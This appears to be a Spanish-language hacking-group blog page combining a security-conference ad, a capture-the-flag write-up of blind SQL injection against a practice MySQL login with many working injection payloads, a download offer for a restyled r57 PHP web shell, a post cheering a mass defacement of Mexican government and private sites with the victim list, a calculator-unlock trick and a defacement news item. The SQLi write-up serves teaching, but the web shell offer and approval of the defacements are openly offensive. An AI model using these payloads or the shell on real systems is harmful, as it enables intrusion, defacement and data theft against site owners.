El Centro de Estudios Superiores en Alta tecnología en coordinación con la Asociación Latinoamericana de Especialistas en Seguridad Informática (ALAPSI) a través del CCAT Research Labs, organizan el primer:

“X.25 Ethical Hacking Conferences”

Uno de los principales eventos en Latinoamérica relacionado con la seguridad informática.

El “X.25 Ethical Hacking Conferences” permitirá reunir a investigadores reconocidos a nivel nacional y mundial quienes compartirán las nuevas tendencias de la seguridad informática a un nivel totalmente técnico quienes son provenientes de una gran variedad de universidades e instituciones de educación superior, organizaciones comerciales del sector público y privado e investigadores que por su propia cuenta han hecho descubrimientos en cuestión de seguridad informática se refiere.

Este evento se dividirá en dos etapas: los talleres de Especialización enfocados a capacitar en las principales áreas de Seguridad Informática, y el ciclo de Conferencias impartidas por reconocidos expertos que serán invitados a este magno evento para compartir sus últimas investigaciones y experiencias en el área.

Las Conferencias y los talleres de Seguridad Informática se llevarán a cabo del

22 al 23 de Octubre del 2010

Sede: Xalapa, Ver. México

Para mayores informes: x.25sec

Eventos, hack, México, seguridad

Bueno después de no dejarles nada desde hace ya tiempo, les dejo este documento escrito por jde hace ya tiempo, la verdad le perdí el rastro a nuestro amigo jde, esto data de cuando aun n3ur0n4 pretendía ser un hack team allá en los canales de red-latina.

Sin mas tonterías que poner les dejo el documento…

======================================

Reto: Prueba de inyeccion SQL v3 by jde

—– —— — ——— — — — —

Hola muchachos/as aca estoy escribiendo un minituto del tercer reto que propuso emadicius sobre inyeccion sql, que despues de peliarlo un par de horas pudimos salir vencedores :P. El reto consistia en sacar la mayor cantidad informacion posible de la base de datos, es decir que base de datos era, el nombre de la DB, el nombre de la tabla, el nombre de sus campos y su tipos, jujuj bue vamos a ver que podemos hacer…. ;)

1) Aproximacion

Cargamos el reto en el navegador y vemos dos input que piden Usuario y Password, probamos metiendo unas inocentes comillitas por algun lado y si ponemos por ejemplo en Usuario:’p y en Password:’p , la base nos tira el siguiente error:

Error:

com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘u’ and pass=”p” at line 1

Por suerte pudimos robar un pedazo de la consulta :D. Ahora sabemos que la consulta es de la forma:

…’xxxxxx’ and pass=’yyyyyy’….

Donde las xxxxxx son el usuario ingresado y las yyyyyyy el password ingresado. Al saber esto ya podemos empezar a inyectar codigo SQL, y hacer esto de manera valida sin que se produscan errores de sintaxis. Bastaria con hacer que nuestros xxxxxxx e yyyyyyy sean por ejemplo de la forma:

xxxxxxx=’SSSSSSSSS and ”=’

yyyyyyy=’QQQQQQQQQ and ”=’

Donde SSSSS y QQQQ es codigo SQL. Ya que si remplazmos esto en lo que sabiamos quedaria algo como:

…’xxxxxx’ and pass=’yyyyyy’…. —-> …”SSSSSSSSS and ”=” and pass=”QQQQQQQQQ and ”=”….

Lo que no tiene errores de sintaxis, siempre y cuando sea coherente lo de SSSSS y lo de QQQQQQ.

Tambien ya sabes que se trata de una base de datos MySQL.

Es mas sabemos que es una MySQL >= 5.0.12 ya que al inyectar la funcion sleep() no nos tira error. Probemoslo con:

xxxxxxx=’ and sleep(10) and ”=’

y como password cualquier cosa…. vemos que no hay error :D.

2) Consiguiendo el nombre de la base de datos

Primero podemos probar si tenemos algo de suerte :P aunque no suelo tenerla :( a veces suele funcionar jejejeje, asi que probemos si existe una tabla con el nombre Usuarios, lo vamos a hacer con la subconsulta EXISTS de la siguiente forma: EXISTS(SELECT * FROM Usuarios). Es decir nuestro SSSSSS sera de igual a:

SSSSSSSS= and EXISTS(SELECT * FROM Usuarios) —-> xxxxxxx=’ and EXISTS(SELECT * FROM Usuarios) and ”=’

Como password no metemos nada y veamos que pasa….

Error:

com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: Table ‘pruebahack.usuarios’ doesn’t exist

Error… =( no tuvimos suerte esta vez… ya que si la tabla hubiese existido no tendriamos error(suponiendo que tenia filas). Pero si miramos bien en realidad si tuvimos suerte porque el error nos esta diciendo que la tabla ‘pruebahack.usuarios’ no existe. Es decir ya conseguimos el nombre de la DB.

La base de datos se llama ‘pruebahack’.

3)Informacion interesante…

Navegando por dev.mysql.com llegue al Capitulo 22 del manual de referencia de MySQL 5.0, el cual trata sobre la base de datos de informacion INFORMATION_SCHEMA, la cual sabemos que existira ya que esta disponible en MySQL >= 5.0.2. Tambien podemos ver que esa base tiene una tabla que se llama TABLES :o y vemos tambien que tiene un cmapo TABLE_NAME :O!!! Entonces esta tablita la podriamos usar para tratar de averiguar el nombre de la tabla en cuestion….

Podriamos plantearnos hacer algo como:

SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=’pruebahack’ AND TABLE_NAME LIKE ‘%%’

Donde entre los %% tendriamos que ir poniendo algo inteligentemente de manera que podamos encontrar el nombre de alguna tabla, y luego ver si esa consulta devuelve algo mayor a 0…

Pero como podiramos hacer para saber que devuelve….recordando las bases de blind SQL Injection, pensamos si podriamos aplicar aca el mismo criterio…

Por suerte si podemos :D

por ejemplo, recordando los otros retos y metiendo como password yyyyyy=’ or 1=1 and ‘1′=’1

Tenemos que…..

OK!!

y si en cambio ponemos yyyyyy=’ or 1=0 and ‘1′=’1

tenemos….

Nada jajaja, recargamos la pagina no mas

Perfecto ya que eso es lo que necesitamos, es decir si la expresion que esta entre el or y el and es true, tenemos un OK, y si es false recargamos la pagina… :)

4)A la carga….

Con lo pensado en el punto anterior, y esperando tener un poco mas de surte ahora nos fijamos si existe una tabla que contenga la palabra Usuarios :P

yyyyyy=’ OR (SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=’pruebahack’ AND TABLE_NAME LIKE ‘%Usuarios%’)>0 and ”=’

….Ok!!!! seeeee un poco de suerte al fin!!!

ahora probamos sacando un % a la vez y vemos que la tabla se llama %Usuarios

Ahora fue no me quedo mas que probar :P y por suerte luego de un par de intentos llegue a que la tabla se llamaba…. Tb_Usuarios

5)Ahora los parametros….

Usando inyecciones como la anterior podemos saber la cantidad de las columnas:

yyyyyy=’ OR (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=’Tb_Usuarios’)=3 and ”=’

Por el punto uno sabemos que una columna se llama pass, lo que podemos verificar inyectando:

yyyyyy=’ OR (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=’Tb_Usuarios’ and column_name=’pass’)=1 and ”=’

Que tal si probamos si existe una user??

yyyyyy=’ OR (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=’Tb_Usuarios’ and column_name=’user’)=1 and ”=’

jejeje estamos de suerte!! ;D

Recapitulemos, sabemos que tiene 3 columnas y ya conocemos 2… a esta tabla le podria faltar un Id ;)….probemos….

yyyyyy=’ OR (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=’Tb_Usuarios’ and column_name=’Id’)=1 and ”=’

Perfecto!!!

Ya tenemos la cantidad de columnas y los nombres, solo nos quedan sus tipos….

Lo cual lo hacemos de la misma forma jajajaj :D

Por ejemplo sospechamos que el campo pass y el user deven ser algo de CHAR, entonces probemos….

yyyyyy=’ OR (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=’pruebahack’ and column_name=’user’ and data_type LIKE ‘%CHAR%’)>0 and ”=’

yyyyyy=’ OR (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=’pruebahack’ and column_name=’pass’ and data_type LIKE ‘%CHAR%’)>0 and ”=’

Y despues de ahi cambiando %CHAR% por VARCHAR nos damos cuenta que son VARCHAR :D…. pero de cuanto….

yyyyyy=’ OR (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=’pruebahack’ and column_name=’pass’ and CHARACTER_MAXIMUM_LENGTH LIKE ‘10′)>0 and ”=’

Y jugando con ese 10 y lo mismo con el campo user obtenemos que pass es VARCHAR(100) y user VARCHAR(50).

Solo queda el tipo del campo Id,lo cual sospechamos que es int y lo comprobamos asi ;)

yyyyyy=’ OR (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=’pruebahack’ and column_name=’Id’ and data_type LIKE ‘INT’)>0 and ”=’

Y listo!!!! Ya conseguimos toda la info, es un motor MySQL >= 5.0.12, la DB se llama ‘pruebahack’, y los campos son Id (INT), user (VARCHAR(50)) y pass (VARCHAR(100)).

6)Despedida…

Bueno este fue mi primer tuto, y espero que le sirva a alguno :P y avisenme de los errores que debe tener jajaja.

A su vez aprovecho este lugar para agradecerle a todo el grupo ya que me dejaron entrar y espero poder aprender mucho y compartir el conocimiento con ustedes, de manera que eoupo sea mejor en todos sus aspectos.

Saludos, jde.

Documentos, manuales, papers, seguridad, sql-injection

Log enviado por un anonimo, los nicks han sido cambiados a peticion de los participantes en el siguiente log.

ataques, bancos, hack, IRC, log, logs

sin tener nada que hacer comencé a modificar el estilo de la php r57 shell para adaptarlo al puro estilo de n3ur0n4 c0rp les dejo un screen de la apariencia final, la he provado y es funcional a menos que el estilo de tanto cambiar por aquí y por allá se haya alterado el código esencial, si pasa lo segundo favor de hacérmelo saber :D

1. r57 n3ur0n4 shell.rar <– r57 shell modificada estilo n3ur0n4
2. shell r57.rar <– Shell Original

Codex, codigo, hack, n3ur0n4, php, r57 shell, remote shell, seguridad, shell

Hoy 16 de noviembre me encuentro con la noticia del hackeo masivo de la siguiente lista de webs, a cargo de CPM un grupo de desfacers que ya empezaron su ciberprotesta contra este gobierno que oprime a todo el pueblo, haciendo a los pobres aun mas y a los ricos aun más ricos, me gustaría un país socialista pero sin embargo los que tenemos la culpa somos el propio pueblo mexicano que deja que el gobierno haga lo que desee con nuestro impuestos.

Una felicitación a CPM por sus ataques y no es que lo apruebe del todo sin embargo lo creo necesario ya si no acuden a nuestras propuestas como pueblo a base de marchas por que no a base de ataques a sus sistemas, le pregunto a esos políticos, creen que con su propuesta de mas impuestos y aun mas de atacar las telecom que es donde estas cibersociedades surgen y se desenvuelven, creen que no iban a tener una respuesta?

No mas impunidad en este país, necesitamos criminólogos que no solo busquen a ver quien se la paga, a ver quien presentan ante la sociedad y listo.

Aun mas son las protestas de la cibersociedad mexicana en este desface, todos tienen algo que expresar.

El hilo de las protestas esta en http://informaticaxd.com.ar/prot/all.php todos propongan algo…

Lista de páginas hackeadas:

• http://www.mexicosos.com.mx/
• http://www.cofupro.org.mx
• http://www.palenqueonline.com/
• http://www.colima.gob.mx/
• http://www.tuxtla.gob.mx/
• http://www.casadelarchivo.gob.mx/
• http://www.spm.org.mx/
• http://convermex.com.mx/
• http://www.laboratoriosjulio.com.mx/
• http://www.parggon.com.mx/
• http://www.colegiocervantesprimaria.edu.mx/
• http://www.monitorapcj.com/
• http://eldiariodechihuahua.com.mx/
• http://www.arrobajuarez.com
• http://www.lapuertanoticias.com
• http://www.almargen.com.mx/
• http://www.eldiariodedelicias.com.mx/
• http://plataformafinancierajz.com/
• http://www.regionlibre.com
• http://flymissions.com/
• http://www.hallofmetal.com/
• http://www.sdr.gob.mx/
• http://www.gruposaveres.com/
• http://www.colorescreativos.com.mx/
• http://www.lasarenasclub.org/
• http://www.liconsa.gob.mx/
• http://agendapublica.org/
• http://www.panhgo.org.mx/
• http://www.michoacan.gob.mx/
• http://www.h24.com.mx/
• http://juanmanuelpresidente2009.com/
• http://ligadeunidadsocialista.org/
• http://pulidodipan.org.mx/

ataques, gobierno, hack, México, seguridad

Nuestra calculadora CASIO fx-82MS al prenderla podemos ver a contraluz que puede hacer operaciones con números complejos, sin embargo la compañía casio bloquea las funciones de algunos de sus modelos para poder cobrarnos mas por algún modelo que traiga integradas dichas funciones.

Bueno sin mas basura que agregar vamos a proceder con este truco podrás hacer operaciones con números complejos, resolver sistemas de ecuaciones, cambiar entre sistemas binario, decimal, hexadecimal y octal, nos muestra que puede resolver matrices pero la verdad no he encontrado como XD, y vectores que tampoco he podido. El truco se muestra a continuación:

1. Encendemos la calculadora.

2. Apretamos la tecla (MODE/CLR) que esta a un costado de la de (ON).

3. Seleccionamos el modo SD (apretamos el numero 2).

4. Presionamos la tecla 1 como para empezar a realizar cualquier operación.

5. Con el 1 en nuestro display apretamos la tecla (M+) nos aparecerá en pantalla un n= 1.

6. seguimos apretando (M+) hasta llegar a 80

7. Después de esto apretaremos una vez mas el (M+) y nos aparecerá un DATA FULL en pantalla.

8. Apretaremos nuevamente la tecla (M+) y nos aparecerán dos opciones EditOFF (1) y ESC (2) presionamos el números (2).

9. Presionamos la tecla de dirección hacia (ARRIBA) y nos saldrá Freq80= presionamos los números (1) y (3) alternadamente así como: 1313131313, hasta llenar la pantalla.

10. Apretamos la tecla de (= ) y nuevamente veremos un Data Full presionamos otra vez (=) y nos aparecerán las opciones EditOFF (1) y ESC (2).

11. Para finalizar presionaremos los números (0) y después (1) y después la tecla de (=) y nos dará un Syntax ERROR presionamos AC.

12. Ahora al presionar (MODE/CLR) veremos los modos desbloqueados antes dichos.

En realidad este truco es muy tedioso pero te puedes ahorrar algunas monedas, espero les sirva, el truco me lo enseño un profesor de la ingeniería pero ya veo que en google hay sitios que ya lo tienen…

calculadora, casio, desbloqueo, funciones, hack, trucos

Un grupo de ciberdelincuentes realizaron un deface a la página del Gobierno de Colima. Un grupo que se hace llamar Mexican Defacers Mafia se han adjudicado el “desfiguramiento” dejando mensajes en contra de la Reforma a la Educación Media Superios y contra el Sistema Nacional de Bachillerato.

Fuente: http://www.pateandopiedras.com/?p=17592

Hasta que se hace algo, recuerdo aquel ataque que sufrio cecyt9 del ipn jaja, ni modo…

ataques, gobierno, hack, México

video hecho por PerverthsO un gran competidor en esto de los wargames y que nos ha dejado publicar algo de su material sobre sql-inyection.

hack, sql-injection, tutoriales, Video